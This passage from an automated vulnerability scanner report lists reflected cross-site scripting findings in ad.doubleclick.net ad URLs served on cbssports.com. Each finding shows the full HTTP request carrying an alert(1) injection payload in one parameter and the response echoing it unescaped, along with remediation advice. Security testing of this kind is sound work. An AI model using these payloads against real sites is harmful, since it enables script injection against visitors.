GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21cf16f"-alert(1)-"7e369353b08&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21cf16f"-alert(1)-"7e369353b08&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_2011");
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess
...[SNIP]...

3.27. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 37ee0"-alert(1)-"3d34f88242f was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=5937ee0"-alert(1)-"3d34f88242f&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=5937ee0"-alert(1)-"3d34f88242f&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=
...[SNIP]...

3.28. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 73396"-alert(1)-"18438590649 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=73396"-alert(1)-"18438590649&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:23:41 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
22/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=73396"-alert(1)-"18438590649&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&ev
...[SNIP]...

3.29. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0fcf"-alert(1)-"47f798ca518 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c0fcf"-alert(1)-"47f798ca518&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
3431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=c0fcf"-alert(1)-"47f798ca518&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque
...[SNIP]...

3.30. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [cpnmodule parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e43bb"-alert(1)-"1134bc564bc was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=e43bb"-alert(1)-"1134bc564bc&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
6%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=e43bb"-alert(1)-"1134bc564bc&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode =
...[SNIP]...

3.31. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb41b"-alert(1)-"3856831bc1c was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=fb41b"-alert(1)-"3856831bc1c&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:24:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
9/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=fb41b"-alert(1)-"3856831bc1c&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/htt
...[SNIP]...

3.32. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [epartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d07d0"-alert(1)-"428cd6eea0d was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=d07d0"-alert(1)-"428cd6eea0d&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:25:03 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
m/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=d07d0"-alert(1)-"428cd6eea0d&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
va
...[SNIP]...

3.33. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [event parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the event request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30a1f"-alert(1)-"2ca852a0d31 was submitted in the event parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=30a1f"-alert(1)-"2ca852a0d31 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6990
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 27 Apr 2011 23:26:52 GMT
Expires: Wed, 27 Apr 2011 23:26:52 GMT

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=30a1f"-alert(1)-"2ca852a0d31http://www.mostlivesports.com/?dfaid=2199899&cmp=0");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "
...[SNIP]...

3.34. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the h request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 931fa"-alert(1)-"bfe7ab35173 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn931fa"-alert(1)-"bfe7ab35173&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:47 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
40390296%3B0-0%3B0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn931fa"-alert(1)-"bfe7ab35173&p=2&b=59&l=en_US&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.21
...[SNIP]...

3.35. http://ad.doubleclick.net/adi/N3220.cbssports.comOX5267/B5473102 [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N3220.cbssports.comOX5267/B5473102

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f38f"-alert(1)-"85e64b01986 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N3220.cbssports.comOX5267/B5473102;sz=300x250;pc=cbs511522;click0=http://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US1f38f"-alert(1)-"85e64b01986&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0GW4AAGmuT7M&t=2011.04.27.23.18.51&event=58/;ord=2011.04.27.23.18.51? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 7002

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Mon Apr 25 11:25:52 EDT 2011 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
0%3B63194397%3B4307-300/250%3B41862222/41880009/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs511522%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=15648&sg=511522&o=22072%253a22416%253a23431%253a&h=cn&p=2&b=59&l=en_US1f38f"-alert(1)-"85e64b01986&site=175&pt=6866&nd=23431&pid=&cid=&pp=100&e=&rqid=00phx1-ad-e22:4DB6D3A611C385&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=TbikVQq0
...[SNIP]...

